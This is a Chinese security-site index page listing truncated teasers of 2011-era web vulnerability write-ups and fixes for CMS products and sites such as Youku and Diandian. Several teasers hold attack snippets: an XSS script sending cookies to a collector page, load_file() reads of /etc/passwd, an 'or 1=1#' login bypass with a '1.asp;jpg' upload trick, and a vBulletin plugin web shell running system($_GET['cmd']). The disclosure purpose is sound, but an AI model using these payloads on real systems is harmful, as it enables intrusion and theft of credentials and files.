万网第三方程序安全缺陷及修复 - 网站安全 - 自关注热度:17

详细说明：dede 远程包涵 可直接一句话漏洞证明：修复方案：删除 tddt.php 文件作者.AK.@乌云..[详情]

Android 'content://' URI多个信息泄露 - 网站安关注热度:62

?php/** Description: Android #39;content://#39; URI Multiple Information Disclosure Vulnerabilities* Bugtraq ID: 48256* CVE: CVE-2010-4804* Affected: Android 2.3.4* Author: .....[详情]

优酷网CSRF致无限制顶或者踩一个视频及修复 - 网关注热度:18

简要描述：允许用户无限制的将一个视频置顶，或者置底详细说明：无限制顶或者踩一个视频漏洞证明：http://v.youku.com/v_show/id_XMzE1ODYzOTEy.html先查看当前的顶和踩的票数，再访问以下的链..[详情]

行业之星0.87 vote.php注入及修复 - 网站安全 - 自学关注热度:20

Team:t00ls Author: Cond0r代码。vote.php if($_REQUEST[#39;op#39;] == #39;poll#39;) { if($_POST[#39;op#39;] $_POST[#39;vtid#39;]) //得Post提交上去 { /* 判断是否已经投过票24 .....[详情]

网上在线挂号预约管理系统 v2.0 本地包含及修复关注热度:24

Team:t00ls Author: 风之传说看到各位大牛为了为了版主拼命挖洞，不知不觉带动了偶熄灭已久的基情。在网上查了下，貌似没有这个程序的漏洞信息，就发出来交流学习，反正偶也要洞木有..[详情]

虐神百度小偷v1.0 cookie欺骗及修复 - 网站安全 -关注热度:18

Team:t00ls Author: wming79虐神百度小偷v1.0 cookie欺骗本想发布歪酷CMS漏洞怎么知道cond0r抢先发布了,为了版主他真的豁出去了! 在这里祝他成功!此洞有点2... 毕竟是洞~ 让作者知道下也好.?phpif..[详情]

蓝海豚团购导航 V4.0.4本地包含及修复 - 网站安全关注热度:25

Team:t00ls Author: Cond0r代码代码PS:之前那个商城导航都进行了过滤 这个团购导航竟然木过滤。。我了个去（受GPC..）index.phpif(!empty($_REQUEST[#39;pluginid#39;])){ $pfile=ROOT_PATH.#39;/plugins.....[详情]

蓝海豚商城导航注入及修复 - 网站安全 - 自学p关注热度:23

Team:t00ls Author: Cond0r看代码Index.class.php若干function search_action() { $keyword = $_REQUEST[#39;keyword#39;]; if(empty($keyword)) { exit; }若干 if($_REQUEST[#3.....[详情]

Php安全新闻早8点（2011-11-28 星期一） - 网站安全关注热度:16

//2011-11-28 星期一//程序员思想：www.2cto.com?session_start();$admin = $_POST[#39;admin#39;];$pass = md5($_POST[#39;pass#39;]);$codes = $_POST[#39;codes#39;];if($_GET[#39;action#39.....[详情]

新浪3G网站路径遍历及修复 - 网站安全 - 自学ph关注热度:24

简要描述：对提交的变量没有作安全过滤和可读取文件目录作严格的控制，导致可以读取系统上任意文件，因为是php架构，可能同时导致其它严重问题。详细说明：漏洞证明：http://3g...[详情]

基于发起源判断CSRF攻击的方法 - 网站安全 - 自学关注热度:30

当我们要利用一个CSRF漏洞去攻击的时候，常会在第三方站点使用资源请求的方式加载存在漏洞的CSRF接口，当用户访问这个页面的时候就会偷偷的发送http request到漏洞站点，即攻击成功。..[详情]

要哇导航网建站系统 v3.2 注入漏洞及修复 - 网站关注热度:22

Team:t00ls Author: Cond0r随便打开一个代码文件就发现了。。看代码省略若干代码public function index() { //读取数据库判断 $type = M(#39;type#39;); $list = $type-where(#39;type.....[详情]

歪酷CMS v1.0 注入漏洞及修复 - 网站安全 - 自学p关注热度:18

Team:t00ls Author: Cond0r随便打开一个代码文件就发现了。。看代码省略若干代码public function index() { //读取数据库判断 $type = M(#39;type#39;); $list = $type-where(#39;type.....[详情]

Php安全新闻早8点（2011-11-27 星期日） - 网站安全关注热度:31

//2011-11-27 星期日//正则实战（2）：Preg_match验证URL$subscr=$_REQUEST[#39;subscr#39;];//url validationif (preg_match(#39;|^http(s)?://[a-z0-9-]+(.[a-z0-9-]+)*(:[0-9]+)?(/.*)?$|i#39;, $sub.....[详情]

利用XSS转存Cookie - 网站安全 - 自学php关注热度:22

利用XSS转存cookie:插入XSS语句scriptdocument.write(#39;img src= width=0 height=0 border=0 /#39;);/script其中Cookies.asp为文件,website为网址.我们需要将asp文件放入一个可访问的网站中.当.....[详情]

基于PHP+MySQL渗透测试中load_file()函数淫荡用法 -关注热度:17

1、replace(load_file(0times;2F6574632F706173737764),0times;3c,0times;20)2、replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))上面两个是查看一个PHP文件里完全显示.....[详情]

php video script SQL注射缺陷及修复 - 网站安全 - 自学关注热度:20

标题: php video script SQL Injection Vulnerability作者: longrifle0x www.2cto.com www.security-research.ge下载地址:http://www.alurian.com/php-video-script/测试工具: SQLMAP概述在video_tags.....[详情]

冰山信息发布系统后台登陆漏洞及修复 - 网站安关注热度:19

默认后台为 admin可直接利用 a or 1=1# php万能密码进后台后台有上传 直接上传 1.asp;jpg点击查看原文件可知路径摘自 少龙blogwww.2cto.com修复方案：过滤..[详情]

126cms后台登陆注入漏洞及修复 - 网站安全 - 自学关注热度:15

看代码。。01 若干02 if( !$postdb[userid] || !$postdb[pwd] )03 {04 echo div align=\center\ class=\style1\;05 echo 您输入的用户名或密码有误！!!;06 echo /div;.....[详情]

vBulletin论坛后台拿shell及修复 - 网站安全 - 自学关注热度:17

在后台，进插件管理.添加插件. Ajax_complete 填入代码:if(isset($_GET[#39;cmd#39;])){echo h1cmd/h1pre; system($_GET[#39;cmd#39;]);exit;}激活mod 访问：www.2cto.com /forumlocation/aja.....[详情]

点点网反射型XSS Ⅱ及formKey泄露 - 网站安全 - 自学关注热度:20

模版静态资源上传页面（http://www.diandian.com/upload/asset）和Flash跨域通信的配置文件中（http://www.diandain.com/crossdomain.xml）允许的域名相同，只需上传一个SWF，就可以读到formKey了。把这SWF嵌..[详情]

点点网存储型Xss详细分析及解决 - 网站安全 - 自关注热度:19

点点网某处编程缺陷导致存储型Xss。响应xsser的精神，分享就要写过程。--------------------------------1. 点点网，在xxx.diandian.com域下是允许自定义JS内容的，但是没有formkey的话，无非进行写操..[详情]

Hotel Booking Portal v0.1多重缺陷及修复 - 网站安全关注热度:23

Hotel Booking Portal v0.1 Multiple Vulnerabilities作者 Yakir Wizman, yakir.wizman@gmail.com下载地址 http://sourceforge.net/projects/hbportal/I. 描述# ---------------------------------.....[详情]

web安全自动化运维 - 网站安全 - 自学php关注热度:20

你有可能也会遇到这种情况，公司没有任何安全设备，也没有资金采购，应付层层攻击，那么作为公司唯有一个安全工程师，如何来自动化保障公司的web安全呢？ 下面，结合我的一些经..[详情]

科讯kesioncms 5.5以下漏洞拿shell方法原理总结 - 网关注热度:28

科讯做为一个强大的cms程序大多被政府和教育机构网站所使用，关于科讯的漏洞利用教程网上不是很多。由于科讯的后台登陆需要输入认证码，而认证码没有保存在数据库而是保存在a..[详情]

欧朋浏览器官网短信缺少验证致短信炸弹 - 网站关注热度:73

http://www.oupeng.com/download 可以被利用 进行手机轰炸http://www.oupeng.com/wp-content/plugins/sms/sendsms.php?mobile= +手机号但是要提交cookies 、、、简单一抓cookies=__utmc=247447450; _gscbrs.....[详情]

点点某功能两处存储型XSS与一个反射型xss - 网站关注热度:24

看到点点博客，一下子就喜欢上了它的简洁清新的风格，当然，自己喜欢的东西潜意识里总希望它能好上加好，所以就花了一些时间给点点做了下简单的xss测试，希望通过我的一点点努..[详情]

二级域名的查找与扫描 - 网站安全 - 自学php关注热度:101

关于域名的概念我不在这里做过多介绍。关于查找和扫描二级域名的作用，我想对于每一个搞渗透的同志来说是至关重要的。就一点：当主站无从下手的时候，你可以从C段，同IP站点下..[详情]

WordPress插件Mz-jajak <= 2.1 SQL注射及修复 - 网站安关注热度:26

标题: WordPress Mz-jajak plugin = 2.1 SQL Injection Vulnerability作者: StRoNiX www.2cto.com hacker@hotmail.rs下载地址: http://downloads.wordpress.org/plugin/mz-jajak.zip影响版本: 2.1.....[详情]

ProQuiz v2.0.2多重缺陷及修复 - 网站安全 - 自学ph关注热度:67

标题: ProQuiz v2.0.2 - Multiple Vulnerabilities作者: L0n3ly-H34rT http://www.2cto.com/ l0n3ly_h34rt@hotmail.com程序官网: http://proquiz.softon.org/下载地址: http://code.google.com/p/proq.....[详情]